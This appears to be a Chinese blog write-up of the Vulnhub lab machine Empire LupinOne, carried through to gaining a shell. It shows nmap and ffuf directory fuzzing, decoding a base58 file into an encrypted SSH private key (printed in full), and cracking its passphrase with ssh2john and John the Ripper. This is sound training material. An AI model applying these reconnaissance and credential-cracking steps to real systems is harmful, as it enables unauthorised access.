当前位置: 首页 > article >正文

Vulnhub靶场-Empire_LupinOne(至获取shell)

靶机安装完成后,arp-scan -l扫描靶机IP 为192.168.171.130

使用nmap 192.168.171.130来扫描开启的端口,靶机开启了两个端口,22与80

使用gobuster dir -u http://192.168.171.130/ -x php,txt,jsp,asp -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 扫描目录,发现存在如下目录:

经过我们查看后这些目录中除了robots.txt不存在有用信息。

我们访问robots.txt

发现存在一个带波浪线的目录,访问该目录报错

在apache的旧版本中,~代表系统的主目录,说明myfiles这个目录是存在与apache的主目录中的,那么就说明该系统的主目录中可能还存在其他的目录及文件

那么我们可以使用fuzz通过模糊扫描来扫描主目录下的目录及文件

(经过测试,dirb dirsearch gobuster的模糊测试能力有限,所以使用fuzz)

ffuf -u url/FUZZ(要爆破的位置) -w 字典 -t 线程数 -mc 只显示的响应码

-recursion 递归扫描 -recursion-depth n 递归深度 -e 指定后缀 FUZZ前面可以加~,~说明是主目录,特指旧版本apache

命令为:ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.171.130/~FUZZ'

扫描到了主目录下还存在一个secret的目录或文件,我们访问它

这个页面告诉了我们一个有一个用户名为icex64,并且该目录下还存在存放着密码的文件

那么我们需要继续扫描该目录,来查看该目录下存在什么文件

ffuf -c -w /usr/share/wordlists/dirb/common.txt -u 'http://192.168.171.130/~secret/.FUZZ' -e .txt,.html -fc 403

-fc 过滤指定的返回状态码;-e 逗号分隔的扩展名列表,可以指定爆破的文件扩展名

并没有扫到,我们尝试更换字典来进行扫描

ffuf -c -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -u 'http://192.168.171.130/~secret/.FUZZ' -e .txt,.html -fc 403

(.FUZZ 表示不仅扫描正常的目录,还会扫描一遍.开头目录,例如 /public和/.public都会扫描一遍)

(-e .txt .html 表示不仅字典替换扫描,还会在字典后面添加.txt/.html扫描一遍)

发现扫描到了一个.mysecret.txt 我们访问它,

通过该Decrypt a Message - Cipher Identifier - Online Code Recognizer识别解码得知为base58编码,我们对他进行解码

解压出来的内容为:

-----BEGIN OPENSSH PRIVATE KEY-----

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

iUJ66WmRUN9EoVlkeCzQJwivI=

-----END OPENSSH PRIVATE KEY-----

告诉了我们私钥

使用私钥进行ssh连接,发现需要密码,所以我们需要使用ssh2johnJohn the Ripper进行暴力破解

ssh2john

安装:

sudo apt install john

使用 ssh2john 将私钥转换为 John 可识别的格式:

ssh2john /path/to/private_key > private_key.hash

使用 John 破解密码:

john private_key.hash

最后得到了密码为P@55w0rd!

然后我们使用密码进行连接:

我们就获取到了shell


http://www.kler.cn/a/457060.html

相关文章:

  • 【Qt】编辑框/按钮控件---实现HelloWorld
  • Qt资源文件复制路径与实际路径不一致
  • 威胁建模助力企业“建防御 抓运营”
  • 物联网防爆小型气象站
  • python基于机器学习的水稻病虫害识别
  • 攻防世界web新手第四题easyphp
  • Windows系统shell32.dll丢失怎么解决?找不到shell32.dll文件是什么原因?
  • vue 嵌套el-dialo,当内层的弹窗弹出时,整个页面被遮罩
  • DeepSpeed 使用 LoRA 训练后文件结构详解
  • 游戏机制与关卡分析:生化危机4村庄战
  • PDF书籍《手写调用链监控APM系统-Java版》第2章 第一个Agent应用
  • FPGA三模冗余4项关键技术(二)
  • 学技术学英文:Spring AOP和 AspectJ 的关系
  • XML SimpleXML
  • SQL经验谈之insert into select *
  • 010 Qt_输入类控件(LineEdit、TextEdit、ComboBox、SpinBox、DateTimeEdit、Dial、Slider)
  • leetcode 297. 二叉树的序列化与反序列化
  • HarmonyOS Next 实现登录注册页面(ARKTS) 并使用Springboot作为后端提供接口
  • 免费干净!付费软件的平替款!
  • ubuntu 系统资源的查看工具